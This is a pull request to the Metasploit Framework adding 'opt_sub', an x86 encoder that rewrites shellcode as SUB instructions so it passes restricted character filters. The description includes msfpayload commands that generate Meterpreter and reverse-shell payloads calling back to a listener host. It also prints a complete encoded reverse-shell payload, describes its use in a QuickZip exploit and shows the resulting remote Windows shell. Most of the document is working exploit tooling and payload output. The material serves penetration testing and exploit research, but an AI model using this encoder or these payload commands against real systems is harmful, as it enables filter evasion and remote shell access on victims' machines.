### PR TITLE
Optimised SUB Encoder

### DIFF
--- a/modules/encoders/x86/opt_sub.rb
+++ b/modules/encoders/x86/opt_sub.rb
@@ -142,7 +142,7 @@ class Metasploit3 < Msf::Encoder
     when 'FILEPATH'
       char_set = CHAR_SET_FILEPATH
     else
-      for i in 1 .. 255
+      for i in 0 .. 255
         char_set += i.chr.to_s
       end
     end

--- a/modules/encoders/x86/opt_sub.rb
+++ b/modules/encoders/x86/opt_sub.rb
@@ -1,0 +1,337 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Encoder
+
+  Rank = ManualRanking
+
+  ASM_SUBESP20 = "\x83\xEC\x20"
+
+  SET_ALPHA    = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
+  SET_SYM      = '!@#$%^&*()_+\\-=[]{};\'":<>,.?/|~'
+  SET_NUM      = '0123456789'
+  SET_FILESYM  = '()_+-=\\/.,[]{}@!$%^&*='
+
+  CHAR_SET_ALPHA         = SET_ALPHA + SET_SYM
+  CHAR_SET_ALPHANUM      = SET_ALPHA + SET_NUM + SET_SYM
+  CHAR_SET_FILEPATH      = SET_ALPHA + SET_NUM + SET_FILESYM
+
+  def initialize
+    super(
+      'Name'             => 'Sub encoder (optimised)',
+      'Description'      => %q{
+        Encodes a payload using a series of SUB instructions and writing the
+        encoded value to ESP. This concept is based on the known SUB encoding
+        approach that is widely used to manually encode payloads with very
+        restricted allowed character sets. It will not reset EAX to zero unless
+        absolutely necessary, which helps reduce the payload by 10 bytes for
+        every 4-byte chunk. ADD support hasn't been included as the SUB
+        instruction is more likely to avoid bad characters anyway.
+
+        The payload requires a base register to work off which gives the start
+        location of the encoder payload in memory. If not specified, it defaults
+        to ESP. If the given register doesn't point exactly to the start of the
+        payload then an offset value is also required.
+
+        Note: Due to the fact that many payloads use the FSTENV approach to
+        get the current location in memory there is an option to protect the
+        start of the payload by setting the 'OverwriteProtect' flag to true.
+        This adds 3-bytes to the start of the payload to bump ESP by 32 bytes
+        so that it's clear of the top of the payload.
+      },
+      'Author'           => 'OJ Reeves <oj@buffered.io>',
+      'Arch'             => ARCH_X86,
+      'License'          => MSF_LICENSE,
+      'Decoder'          => { 'BlockSize'  => 4 }
+    )
+
+    register_options(
+      [
+        OptString.new( 'ValidCharSet', [ false, "Specify a known set of valid chars (ALPHA, ALPHANUM, FILEPATH)" ]),
+        OptBool.new( 'OverwriteProtect', [ false, "Indicate if the encoded payload requires protection against being overwritten" ])
+      ],
+      self.class)
+  end
+
+  #
+  # Conver the shellcode into a set of 4-byte chunks that can be
+  # encoding while making sure it is 4-byte aligned.
+  #
+  def prepare_shellcode(sc, protect_payload)
+    # first instructions need to be ESP offsetting if the payload
+    # needs to be protected
+    sc = ASM_SUBESP20 + sc if protect_payload == true
+
+    # first of all we need to 4-byte align the payload if it
+    # isn't already aligned, by prepending NOPs.
+    rem = sc.length % 4
+    sc = @asm['NOP'] * (4 - rem) + sc if rem != 0
+
+    # next we break it up into 4-byte chunks, convert to an unsigned
+    # int block so calculations are easy
+    chunks = []
+    sc = sc.bytes.to_a
+    while sc.length > 0
+      chunk = sc.shift + (sc.shift << 8) + (sc.shift << 16) + (sc.shift << 24)
+      chunks << chunk
+    end
+
+    # return the array in reverse as this is the order the instructions
+    # will be written to the stack.
+    chunks.reverse
+  end
+
+  #
+  # From the list of characters given, find two bytes that when
+  # ANDed together result in 0. Returns nil if not found.
+  #
+  def find_opposite_bytes(list)
+    list.each_char do |b1|
+      list.each_char do |b2|
+        if b1.ord & b2.ord == 0
+          return (b1 * 4), (b2 * 4)
+        end
+      end
+    end
+    return nil, nil
+  end
+
+  #
+  # Entry point to the decoder.
+  #
+  def decoder_stub(state)
+    return state.decoder_stub if state.decoder_stub
+
+    # configure our instruction dictionary
+    @asm = {
+      'NOP' => "\x90",
+      'AND' => { 'EAX' => "\x25" },
+      'SUB' => { 'EAX' => "\x2D" },
+      'PUSH' => {
+        'EBP' => "\x55", 'ESP' => "\x54",
+        'EAX' => "\x50", 'EBX' => "\x53",
+        'ECX' => "\x51", 'EDX' => "\x52",
+        'EDI' => "\x57", 'ESI' => "\x56"
+      },
+      'POP' => { 'ESP' => "\x5C", 'EAX' => "\x58", }
+    }
+
+    # set up our base register, defaulting to ESP if not specified
+    @base_reg = (datastore['BufferRegister'] || 'ESP').upcase
+
+    # determine the required bytes
+    @required_bytes =
+      @asm['AND']['EAX']  +
+      @asm['SUB']['EAX']  +
+      @asm['PUSH']['EAX'] +
+      @asm['POP']['ESP']  +
+      @asm['POP']['EAX']  +
+      @asm['PUSH'][@base_reg]
+
+    # generate a sorted list of valid characters
+    char_set = ""
+    case (datastore['ValidCharSet'] || "").upcase
+    when 'ALPHA'
+      char_set = CHAR_SET_ALPHA
+    when 'ALPHANUM'
+      char_set = CHAR_SET_ALPHANUM
+    when 'FILEPATH'
+      char_set = CHAR_SET_FILEPATH
+    else
+      for i in 1 .. 255
+        char_set += i.chr.to_s
+      end
+    end
+
+    # remove any bad chars and populate our valid chars array.
+    @valid_chars = ""
+    char_set.each_char do |c|
+      @valid_chars << c.to_s unless state.badchars.include?(c.to_s)
+    end
+
+    # we need the valid chars sorted because of the algorithm we use
+    @valid_chars = @valid_chars.chars.sort.join
+    @valid_bytes = @valid_chars.bytes.to_a
+
+    all_bytes_valid = @required_bytes.bytes.reduce(true) { |a, byte| a && @valid_bytes.include?(byte) }
+
+    # determine if we have any invalid characters that we rely on.
+    unless all_bytes_valid
+      raise RuntimeError, "Bad character set contains characters that are required for this encoder to function."
+    end
+
+    unless @asm['PUSH'][@base_reg]
+      raise RuntimeError, "Invalid base register"
+    end
+
+    # get the offset from the specified base register, or default to zero if not specifed
+    reg_offset = (datastore['BufferOffset'] || 0).to_i
+
+    # calculate two opposing values which we can use for zeroing out EAX
+    @clear1, @clear2 = find_opposite_bytes(@valid_chars)
+
+    # if we can't then we bomb, because we know we need to clear out EAX at least once
+    unless @clear1
+      raise RuntimeError, "Unable to find AND-able chars resulting 0 in the valid character set."
+    end
+
+    protect_payload = (datastore['OverwriteProtect'] || "").downcase == "true"
+
+    # with everything set up, we can now call the encoding routine
+    state.decoder_stub = encode_payload(state.buf, reg_offset, protect_payload)
+
+    state.buf = ""
+    state.decoder_stub
+  end
+
+  #
+  # Determine the bytes, if any, that will result in the given chunk
+  # being decoded using SUB instructions from the previous EAX value
+  #
+  def sub_3(chunk, previous)
+    carry = 0
+    shift = 0
+    target = previous - chunk
+    sum = [0, 0, 0]
+
+    4.times do |idx|
+      b = (target >> shift) & 0xFF
+      lo = md = hi = 0
+
+      # keep going through the character list under the "lowest" valid
+      # becomes too high (ie. we run out)
+      while lo < @valid_bytes.length
+        # get the total of the three current bytes, including the carry from
+        # the previous calculation
+        total = @valid_bytes[lo] + @valid_bytes[md] + @valid_bytes[hi] + carry
+
+        # if we matched a byte...
+        if (total & 0xFF) == b
+          # store the carry for the next calculation
+          carry = (total >> 8) & 0xFF
+
+          # store the values in the respective locations
+          sum[2] |= @valid_bytes[lo] << shift
+          sum[1] |= @valid_bytes[md] << shift
+          sum[0] |= @valid_bytes[hi] << shift
+          break
+        end
+
+        hi += 1
+        if hi >= @valid_bytes.length
+          md += 1
+          hi = md
+        end
+
+        if md >= @valid_bytes.length
+          lo += 1
+          hi = md = lo
+        end
+      end
+
+      # we ran out of chars to try
+      if lo >= @valid_bytes.length
+        return nil, nil
+      end
+
+      shift += 8
+    end
+
+    return sum, chunk
+  end
+
+  #
+  # Helper that writes instructions to zero out EAX using two AND instructions.
+  #
+  def zero_eax
+    data = ""
+    data << @asm['AND']['EAX']
+    data << @clear1
+    data << @asm['AND']['EAX']
+    data << @clear2
+    data
+  end
+
+  #
+  # Write instructions that perform the subtraction using the given encoded numbers.
+  #
+  def create_sub(encoded)
+    data = ""
+    encoded.each do |e|
+      data << @asm['SUB']['EAX']
+      data << [e].pack("L")
+    end
+    data << @asm['PUSH']['EAX']
+    data
+  end
+
+  #
+  # Encoding the specified payload buffer.
+  #
+  def encode_payload(buf, reg_offset, protect_payload)
+    data = ""
+
+    # prepare the shellcode for munging
+    chunks = prepare_shellcode(buf, protect_payload)
+
+    # start by reading the value from the base register and dropping it into EAX for munging
+    data << @asm['PUSH'][@base_reg]
+    data << @asm['POP']['EAX']
+
+    # store the offset of the stubbed placeholder
+    base_reg_offset = data.length
+
+    # Write out a stubbed placeholder for the offset instruction based on
+    # the base register, we'll update this later on when we know how big our payload is.
+    encoded, _ = sub_3(0, 0)
+    raise RuntimeError, "Couldn't offset base register." if encoded.nil?
+    data << create_sub(encoded)
+
+    # finally push the value of EAX back into ESP
+    data << @asm['PUSH']['EAX']
+    data << @asm['POP']['ESP']
+
+    # start instruction encoding from a clean slate
+    data << zero_eax
+
+    # keep track of the previous instruction, because we use that as the starting point
+    # for the next instruction, which saves us 10 bytes per 4 byte block. If we can't
+    # offset correctly, we zero EAX and try again.
+    previous = 0
+    chunks.each do |chunk|
+      encoded, previous = sub_3(chunk, previous)
+
+      if encoded.nil?
+        # try again with EAX zero'd out
+        data << zero_eax
+        encoded, previous = sub_3(chunk, 0)
+      end
+
+      # if we're still nil here, then we have an issue
+      raise RuntimeError, "Couldn't encode payload" if encoded.nil?
+
+      data << create_sub(encoded)
+    end
+
+    # Now that the entire payload has been generated, we figure out offsets
+    # based on sizes so that the payload overlaps perfectly with the end of
+    # our decoder
+    total_offset = reg_offset + data.length + (chunks.length * 4) - 1
+    encoded, _ = sub_3(total_offset, 0)
+
+    # if we're still nil here, then we have an issue
+    raise RuntimeError, "Couldn't encode protection" if encoded.nil?
+    patch = create_sub(encoded)
+
+    # patch in the correct offset back at the start of our payload
+    data[base_reg_offset .. base_reg_offset + patch.length] = patch
+
+    # and we're done finally!
+    data
+  end
+end
+

--- a/modules/encoders/x86/opt_sub.rb
+++ b/modules/encoders/x86/opt_sub.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Encoder
   SET_ALPHA    = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
   SET_SYM      = '!@#$%^&*()_+\\-=[]{};\'":<>,.?/|~'
   SET_NUM      = '0123456789'
-  SET_FILESYM  = '()_+-=\\/.,[]{}@!$%^&*='
+  SET_FILESYM  = '()_+-=\\/.,[]{}@!$%^&='
 
   CHAR_SET_ALPHA         = SET_ALPHA + SET_SYM
   CHAR_SET_ALPHANUM      = SET_ALPHA + SET_NUM + SET_SYM


### PR DESCRIPTION
During the course of the CTP labs I learned about a crazy way to do encoding with a very limited character set using a series of SUB instructions. I noticed that this encoding method has been made available in MSF before (add_sub.rb), is available in Mona.py, and Muts himself has even presented on the topic in public.

However, I found that this encoding method isn't as optimal as it could be. The basic premise of the encoding is:
- Figure out a set of valid characters for the exploit.
- Pick a register that contains an address that helps locating the payload.
- Push that register onto the stack, and pop into EAX.
- Adjust the EAX value to point to a safe location after the payload with enough space between it and the end of the payload for the decoded payload to fit.
- Push this value to ESP, then pop into ESP so that the stack points to the bottom of this memory area.
- Do a series of `AND EAX, <value>` instructions to clear EAX, then do 3 `SUB EAX, <value>` instructions which generate values in EAX that match the require decoded payload bytes.
- `PUSH EAX` so that the bytes get written to the stack, which is the area below the payload.
- Keep performing the above until the entire payload is decoded, then continue on and run the decoded instructions.

It's like magic! Very clever stuff.

However, when I learned about this method I realised that it was constructed and taught in such a way that made it easy for the person to do manually. By that, I mean that `EAX` was being zeroed-out each time because it's easier to perform the calculation starting at zero. However, computers are better at mundane/tedious things that fleshware is, and hence an automated encoder shouldn't have to set `EAX` to zero each time, because it could (should) manage to calculate based on the previous instruction. This small change means that 10 bytes per 4-byte decoded block are saved, resulting in payloads that are (on average) around 30% smaller than with the current approach. From my testing, I am yet to find a case where the encoder isn't able to calculate instructions without resetting `EAX` to zero.

This encoder is the result of me porting my Win32 utility which does this optimised SUB encoding to MSF so that it can be enjoyed by others.

I recently used this approach to great effect in an exploit I was working on. This required characters that were valid for inclusion in a file path, and hence this encoder was a perfect fit. This new encoder has a few other settings that are worth mentioning:
- `ValidCharSet` - can be `alpha`, `alphanum` or `filepath`. I'm not sure if this should stay in there, but I thought having some pre-defined useful charsets for this encoder would make sense given that it's primary focus is on very restricted char sets. If this isn't specified then it defaults to a full char set as per normal. It also supports the `-b` switch that removes characters from the resulting set regardless of which character set is chosen up front.
- `OverwriteProtect` - a boolean that defaults to `false`. This is here so that you can easily add a `SUB ESP, 0x20` instruction to the head of the payload to push ESP away to avoid having the top of the payload smashed while it's being run due to the FSTENV dance which is used to figure out the current location in memory.

The existing `BufferRegister` and `BufferOffset` instructions are reused and have the same meaning as for the other encoders. This also does the 4-byte alignment for you by prepending `NOP` instructions if required.

To show the difference it can make, I threw a Meterpreter payload at the current `add_sub` encoder as well as this new `opt_sub` encoder to see the difference. I put the payload in a separate file first:

```
$ msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.10.40 LPORT=8000 R > /tmp/met.bin
$ wc -c /tmp/met.bin
287 /tmp/met.bin
```

I had to manually align the payload to 4-bytes to keep `add_sub` happy, and the result is as follows (formatting added by me):

```
$ cat /tmp/met.bin | msfencode -t raw -e x86/add_sub BufferRegister=EDX BufferOffset=11 > /dev/null
[*] x86/add_sub succeeded with size 1891 (iteration=1)
```

If I throw the meterpreter payload direct at the new encoder this is the result:

```
$ cat /tmp/met.bin | msfencode -t raw -e x86/opt_sub BufferRegister=EDX BufferOffset=11 > /dev/null
[*] x86/opt_sub succeeded with size 1181 (iteration=1)
```

So we can see we've gone from `1891` bytes to `1181` bytes, which in this case is a saving of `710` bytes or `37.5%`. Big savings to be had!

Here's a sample plain reverse shell payload using the `filepath` character set and payload protection (formatting added by me):

```
$ msfpayload windows/shell_reverse_tcp LHOST=10.1.10.40 LPORT=8000 R | msfencode -t raw -e x86/opt_sub BufferRegister=EDX BufferOffset=11 ValidCharSet=filepath OverwriteProtect=true
[*] x86/opt_sub succeeded with size 1309 (iteration=1)

RX-V}}}-![aa-!!!!P\%!!!!%@@@@-}j}}-b!b}-!!!/P-}}M)-OB!!-!!!!
P-\&r}-!%!}-!!!(P-)C}$-!!!!-!!!!P-}}}}-{}V}-=H!jP-}9&7-}$!$-
F!!!P-}$}}-U!{}-!!=^P-}X5}-/!!R-!!!!P-}[Nt-}!!!-T!!!P-F}}}-!
NYX-!!!!P-}}}{-}Cs%-%!!!P-}}=z-{}!!-bT!!P-}C}}-}!k}-$!!OP-}}
6}-t}!K-!(!!P-}}}}-bq^i-!!!!P-}}}}-dWaY-!!!!P-}G}}-}!}s-J![!
P-}}y}-q{!}-!@!%P-{&}}-!!j}-!!!(P-}}}}-}}6{-h+!AP-6}}.-!Mo!-
!!!!P-}x}}-u!}}-!!-eP-}}}[-}/}!-]!S!P-V}3}-!}!U-!+!!P-}}+L-V
c!!-!!!!P-}}}}-{Z}}-%!k5P-/}F}-!_!}-!!!UP-}}}}-H}1.-!Q!!P-}}
}D-XX9!-!!!!P-}y}}-}$}b-I!c!P-}&}4-I!z!-!!=!P-6}{h-!w)!-!!!!
P-}W}L-}!1!-.!!!P-}}}}-RaQa-!!!!P-}}}7-G}}!-!UV!P-}U}}-}!7}-
!!![P-}}}}-}}}}-VDj0P-}U}}-}!$}-N!!ZP-PG}}-!!d}-!!!/P-}\p}-4
!!}-!!!dP-{}}}-AV{y-!!!!P-}0}}-}!}X-K!8!P-j]U}-!$!z-!!!=P-}}
}}-}3}}-2![MP-}gwI-}!!!-a!!!P-\E{}-!!bo-!!!!P-}}{}-}zbW-C=!!
P-}}}}-}}2x-)Y!!P-}}Bw-}}!!-4I!!P-}}}G-}}I!-N8!!P-}}}s-}.q!-
+!!!P-}$}5-p!m!-!!!!P-}}e}-E}!}-!G!MP-8d}$-$!=!-!!!!P-A}6e-!
}!!-!M!!P-2}}Z-!},!-!3!!P-}}&}-}f!4-[!!!P-9}[}-!$!}-!!!SP-}1
}}-_!}K-!!6!P-}}u}-}}!}-WS!PP-I}}u-!{}!-!$M!P-}}}}-/9J}-!!!M
P-}}}}-}}}{-GLMAP-}9}}-4!q=-!!!!P-5s}}-!!z}-!!=9P-}}}}-S}}e-
!JN!P-y}t}-$}!K-!9!!P-}Mf}-}!!}-W!!gP-}}}}-CgtD-!!!!P-}}}}-!
}.C-!J!!P-}y}}-}!}P-6![!P-}W9}-I!!}-!!!CP-z}}}-=_{}-!!)MP-}}
}}-I7\}-!!!1P-}}{9-}(%$-a!!!P-}}}w-}}(!-d+!!P-0}c}-!=!}-!!!&
P-}F}}-9!G}-!!!7P-[}}}-!Aex-!!!!P-}M)}-}!!}-b!!kP
```

Just to demonstrate that puppy in action, here's the result of this reverse shell payload appearing in memory in an exploit for QuickZip on x64 (WOW64):
![encoder-start](https://f.cloud.github.com/assets/28896/2184098/964370b6-97b9-11e3-9011-e82545b6a6e4.png)
Here's the start of the decoding routine when `ESP` has been adjusted:
![encoder-stack](https://f.cloud.github.com/assets/28896/2184099/9d6b84aa-97b9-11e3-8ffc-cfcb5daef33b.png)
And here's the memory area for the payload at the point that it has finished decoding:
![encoder-decoded](https://f.cloud.github.com/assets/28896/2184100/a2256cb8-97b9-11e3-8203-ba7f72314ff1.png)
And here's the shell:

```
Ncat: Connection from 10.1.10.32.
Ncat: Connection from 10.1.10.32:51231.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\OJ\AppData\Local\Temp\QZTEMP>
```

This is the first time I've worked on an encoder for MSF so please point out anything that is stupid about what I've done. Thanks!
